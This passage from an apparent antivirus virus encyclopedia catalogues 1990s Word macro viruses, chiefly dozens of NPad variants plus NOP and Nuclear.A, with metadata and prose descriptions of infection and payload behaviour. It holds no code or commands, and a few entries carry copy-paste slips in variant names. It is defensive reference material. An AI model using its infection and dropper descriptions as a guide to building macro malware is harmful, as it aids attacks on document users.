Size of macros: 250 Bytes
Place of origin: Germany
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: No
Description:
The difference between the this new variant and NOP.A is that
NOP.B does not turn off the prompting of Microsoft Word
before saving the global template (normal.dot). It also enters
the word "Testvirus" at the insertion point.
For more information, please refer to the NOP.A virus.
[Word.NOP.D]
Virus name: Word.NOP.D
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen, NOP
Size of macros: 234 Bytes
Place of origin: USA
Date of origin: January 1997
Destructive: No
Common In-The-Wild: No
Description:
NOP.D is a new variant based on the original Nop.A virus.
The only difference between the two viruses is that NOP.D is
able to infect the English version of Microsoft Word, while
NOP.A only works with the German version.
For more information, please refer to the NOP.A virus.
[Word.NPad.A (DOEUNPAD)]
Virus name: Word.NPad.A (DOEUNPAD)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Bandung, Indonesia
Date of origin: March 1996
Payload: Yes
Common In-The-Wild: Yes
Description:
NPad activates when an infected document is opened
(AutoOpen).
NPad.A also modifies the "compatibility" section inside the
WIN.INI file. It adds a counter under the name of "NPAD328"
and each time the virus is activated, it adds 1 to its value.
Upon reaching a value of 23 it resets the counter and displays
the following message in the status bar:
" DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia "
[Word.NPad.B]
Virus name: Word.NPad.B
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Bandung, Indonesia
Date of origin: March 1996
Destructive: No
Seen In-The-Wild: No
Description:
The difference between this new variant and the original NPad
virus is that some bytes have been patched in the macro virus
code. The result of the change is an invalid instruction. NPad.B
is able to infect the global template and further documents,
yet upon reaching the invalid part of the macro code, it
displays a syntax error message.
The message from the original NPad virus is never displayed.
[Word.NPad.C]
Virus name: Word.NPad.C
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
NPad.C is a minor variant based on the older NPad.A virus.
The only difference between the two viruses is that NPad.C is
a corrupted variant, with some bytes being patches from the NPad.A
virus.
As a result of the corruption, NPad.C only executes some of its
virus code. Infection of the global template and further
documents still works, yet NPad.C never displays the scrolling
message from the original NPad.A virus. Instead it displays a
WordBasic error message.
[Word.NPad.D]
Virus name: Word.NPad.D
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Indonesia
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
NPad.D is a minor variant based on the older NPad.A virus.
The only difference between the two viruses is that NPad.D is
a corrupted variant, with some bytes being patches from the
NPad.A virus.
As a result of the corruption, NPad.D only executes some of
its virus code. Infection of the global template and further
documents still works, yet NPad.D never displays the scrolling
message from the original NPad.A virus. Instead it displays a
WordBasic error message.
[Word.NPad.E]
Virus name: Word.NPad.E
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
NPad.E is a minor variant based on the older NPad.A virus.
The only difference between the two viruses is that NPad.E is
a corrupted variant, with some bytes being patches from the
NPad.A virus.
As a result of the corruption, NPad.E only executes some of its
virus code. Infection of the global template and further
documents still works, yet NPad.E never displays the scrolling
message from the original NPad.A virus. Instead it displays a
WordBasic error message.
[Word.NPad.F]
Virus name: Word.NPad.F
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
NPad.F is a minor variant based on the older NPad.A virus.
The only difference between the two viruses is that NPad.F is
a corrupted variant, with some bytes being patches from the
NPad.A virus.
As a result of the corruption, NPad.F only executes some of its
virus code. Infection of the global template and further
documents still works, yet NPad.F never displays the scrolling
message from the original NPad.A virus. Instead it displays a
WordBasic error message.
[Word.NPad.G]
Virus name: Word.NPad.G
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
NPad.G is a minor variant based on the older NPad.A virus.
The only difference between the two viruses is that NPad.G is
a corrupted variant, with some bytes being patches from the
NPad.A virus.
As a result of the corruption, NPad.G only executes some of its
virus code. Infection of the global template and further documents
still works, yet NPad.G never displays the scrolling message from
the original NPad.A virus. Instead it displays a WordBasic error
message.
[Word.NPad.I]
Virus name: Word.NPad.I
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: January 1997
Destructive: No
Seen In-The-Wild: No
Description:
NPad.I is a minor variant based on the older NPad.A virus.
The only difference between the two viruses is that NPad.I is a
corrupted variant, with some bytes being patches from the
NPad.A virus.
As a result of the corruption, NPad.I only executes some of its
virus code. Infection of the global template and further documents
still works, yet NPad.I never displays the scrolling message from
the original NPad.A virus. Instead it displays a WordBasic error
message.
[Word.NPad.M]
Virus name: Word.NPad.M
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Seen In-The-Wild: No
Description:
NPad.I is a minor variant based on the older NPad.A virus.
The only difference between the two viruses is that NPad.I is a
corrupted variant, with some bytes being patches from the
NPad.A virus.
As a result of the corruption, NPad.I only executes some of its
virus code. Infection of the global template and further documents
still works, yet NPad.I never displays the scrolling message from
the original NPad.A virus. Instead it displays a WordBasic error
message.
[Word.NPad.AB]
Virus name: Word.NPad.AB
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AB has some minor code
modifications.
NPad.AB modifies the "compatibility" section inside the
WIN.INI file. It adds a counter under the name of "NPAD328"
and each time the virus is activated, it adds 1 to its value.
Upon reaching a value of 23 it resets the counter and displays
the following message in the status bar:
" DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia "
It infects the global template when an infected document is
opened. Further documents become infected when they are
also opened (AutoOpen).
[Word.NPad.AD]
Virus name: Word.NPad.AD
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AD has some corrupted codes.
As a result of the corruption, NPad.AD only executes some of
its virus codes. Npad.AD infects the global template (normal.dot)
when an infected document in opened. Further documents
become infected when they are also opened.
[Word.NPad.AE]
Virus name: Word.NPad.AE
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AE has some corrupted codes.
As a result of the corruption, NPad.AE only executes some of
its virus codes. Npad.AE infects the global template (normal.dot)
when an infected document in opened. Further documents
become infected when they are also opened.
[Word.NPad.AF]
Virus name: Word.NPad.AF
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AF has some minor code
modifications and a corrupted counter.
Infection of the global template occurs when an infected
document is opened. Further documents become infected when
they are also opened (AutoOpen).
[Word.NPad.AG]
Virus name: Word.NPad.AG
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AG has some corrupted codes.
As a result of the corruption, NPad.AG only executes some of
its virus codes. Npad.AG infects the global template (normal.dot)
when an infected document in opened. Further documents
become infected when they are also opened.
[Word.NPad.AH]
Virus name: Word.NPad.AH
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AH has some corrupted codes.
As a result of the corruption, NPad.AH only executes some of
its virus codes. Npad.AH infects the global template (normal.dot)
when an infected document in opened. Further documents
become infected when they are also opened.
[Word.NPad.AI]
Virus name: Word.NPad.AI
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AI has some corrupted codes.
As a result of the corruption, NPad.AI only executes some of its
virus codes. Npad.AI infects the global template (normal.dot)
when an infected document in opened. Further documents
become infected when they are also opened.
[Word.NPad.AJ]
Virus name: Word.NPad.AJ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AJ has some corrupted codes.
As a result of the corruption, NPad.AJ only executes some of its
virus codes. Npad.AJ infects the global template (normal.dot)
when an infected document in opened. Further documents
become infected when they are also opened.
[Word.NPad.AK]
Virus name: Word.NPad.AK
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AK has some minor code
modifications.
NPad.AK modifies the "compatibility" section inside the
WIN.INI file. It adds a counter under the name of "NPAD328"
and each time the virus is activated, it adds 1 to its value.
Upon reaching a value of 23 it resets the counter and displays
the following message in the status bar:
" DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia "
It infects the global template when an infected document is
opened. Further documents become infected when they are
also opened (AutoOpen).
[Word.NPad.AM]
Virus name: Word.NPad.AM
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AM has some corrupted codes.
As a result of the corruption, NPad.AM only executes some of
its virus codes. Npad.AM infects the global template when an
infected document in opened. Further documents become infected
when they are also opened.
[Word.NPad.AN]
Virus name: Word.NPad.AN
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Switzerland
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AN has some corrupted codes.
As a result of the corruption, NPad.AN only executes some of
its virus codes. Npad.AN infects the global template (normal.dot)
when an infected document in opened. Further documents
become infected when they are also opened.
[Word.NPad.AO]
Virus name: Word.NPad.AO
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AO has some minor code
modifications.
NPad.AO modifies the "compatibility" section inside the
WIN.INI file. It adds a counter under the name of "NPAD328"
and each time the virus is activated, it adds 1 to its value.
Upon reaching a value of 23 it resets the counter and displays
the following message in the status bar:
" DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia "
It infects the global template when an infected document is
opened. Further documents become infected when they are
also opened (AutoOpen).
[Word.NPad.AP]
Virus name: Word.NPad.AP
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AP has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AP only executes some of
its virus codes. Infection of the global template occurs when
an infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.AQ]
Virus name: Word.NPad.AQ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AQ has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AQ only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.Npad.AS]
Virus name: Word.NPad.AS
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AS has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AS only executes some of its
virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become infected when
they are also opened (AutoOpen).
[Word.NPad.AU]
Virus name: Word.NPad.AU
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Australia
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AU has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AU only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.Npad.AV]
Virus name: Word.NPad.AV
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AV has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AV only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.Npad.AW]
Virus name: Word.NPad.AW
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Netherlands
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AW has a one-byte code
modification.
NPad.AW modifies the "compatibility" section inside the
WIN.INI file. It adds a counter under the name of "NPAD328"
and each time the virus is activated, it adds 1 to its value. Upon
reaching a value of 23 it resets the counter and displays the
following message in the status bar:
" DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia "
It infects the global template when an infected document is
opened. Further documents become infected when they are
also opened (AutoOpen).
[Word.NPad.AX]
Virus name; Word.NPad.AX
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AX has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AX only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.AY]
Virus Name: Word.NPad.AY
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AY has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AY only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.AZ]
Virus name: Word.NPad.AZ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.AZ has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.AZ only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.BA]
Virus name: Word.NPad.BA
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.BA has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.BA only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.BC]
Virus name: Word.NPad.BC
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Australia
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.BC has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.BC only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.BD]
Virus name: Word.NPad.BD
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.BD has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.BD only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.BE]
Virus name: Word.NPad.BE
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.BE has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.BE only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.BF]
Virus name: Word.NPad.BF
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.BF has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.BF only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.BG]
Virus name: Word.NPad.BG
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.BG has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.BG only executes some of
its virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.BI]
Virus name: Word.NPad.BI
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.BI has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.BI only executes some of its
virus codes. Infection of the global template occurs when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.NPad.H]
Virus name: Word.NPad.H
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.H has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.H only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.H never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.J]
Virus name: Word.NPad.J
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.J has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.J only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.J never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.K]
Virus name: Word.NPad.K
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.K has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.K only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.K never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.L]
Virus name: Word.NPad.L
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.L has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.L only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.L never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.O]
Virus name: Word.NPad.O
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.O has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.O only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.O never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.P]
Virus name: Word.NPad.P
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.P has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.P only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.P never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.Q]
Virus name: Word.NPad.Q
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.Q has some minor code modifications and a
corrupted payload.
As a result of the corruption, NPad.Q only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.Q never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.R]
Virus name: Word.NPad.R
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.R has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.Q only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.R never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.S]
Virus name: Word.NPad.S
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.S has some minor code modifications.
NPad.S modifies the "compatibility" section inside the WIN.INI
file. It adds a counter under the name of "NPAD328" and each
time the virus is activated, it increments this counter. Upon reaching
a value of 23 it resets the counter and displays the following
message in the status bar:
" DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia "
It infects the global template when an infected document is
opened. Further documents become infected when they are
also opened (AutoOpen).
[Word.NPad.T]
Virus name: Word.NPad.T
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.T has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.T only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.T never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.U]
Virus name: Word.NPad.U
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.U has some minor code modifications.
NPad.U modifies the "compatibility" section inside the WIN.INI
file. It adds a counter under the name of "NPAD328" and each
time the virus is activated, it adds 1 to the counter. Upon reaching
a value of 23 it resets the counter and displays the following
message in the status bar:
" DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia "
It infects the global template when an infected document is
opened. Further documents become infected when they are
also opened (AutoOpen).
[Word.NPad.V]
Virus name: Word.NPad.V
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.V has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.V only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.V never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.W]
Virus name: Word.NPad.W
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.W has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.W only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.W never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.X]
Virus name: Word.NPad.X
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.X has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.X only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.X never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.Y]
Virus name: Word.NPad.Y
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.Y has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.Y only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.Y never displays the scrolling
message from the original NPad.A virus.
[Word.NPad.Z]
Virus name: Word.NPad.Z
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1831 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and previous
NPad viruses is that NPad.Z has some minor code
modifications and a corrupted payload.
As a result of the corruption, NPad.Z only executes some of its
virus codes. Infection of the global template and further
documents still works, yet NPad.Z never displays the scrolling
message from the original NPad.A virus.
[Word.Nuclear.A(a.k.a. Alert)]
Virus name: Word.Nuclear.A (a.k.a. Alert)
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoExec, AutoOpen, DropSuriv, FileExit, FilePrint,
FilePrintDefault, FileSaveAs, InsertPayload, Payload
Size of macros: 10556 Bytes
Place of origin: Australia
Date of origin: September 1995
Destructive: Yes
Common In-The-Wild: Yes
Description:
Nuclear was the second macro virus found "In-the-Wild" (after
Concept). It was distributed, over the Internet in a document
with information about the Concept virus. It was also the first
macro virus that uses Execute-Only (encrypted) macros to
make analysis more difficult.
Nuclear is activated with the "AutoExec" and "AutoOpen"
macros. Before it infects the global template (normal.dot), it
checks for a previous infection. It does not infect if it finds
the "AutoExec" macro. Documents become infected when
they are saved with the "FileSaveAs" command.
After the virus macros have been transferred to the global
template, Nuclear calls some destructive payloads. The first
payload tries to drop the "Ph33r" virus. Between 17:00 and
17:59, Nuclear creates a text file including a script of the
DOS/Windows-EXE virus "Ph33r". It then uses the DOS
command "DEBUG.EXE" to convert the file into an
executable file. It also creates the "EXEC_PH.BAT" batch file,
and calls it via a Dos shell. This last infection routine is faulty,
the DOS-window is closed immediately, and the "Ph33r" virus
never infects the system.
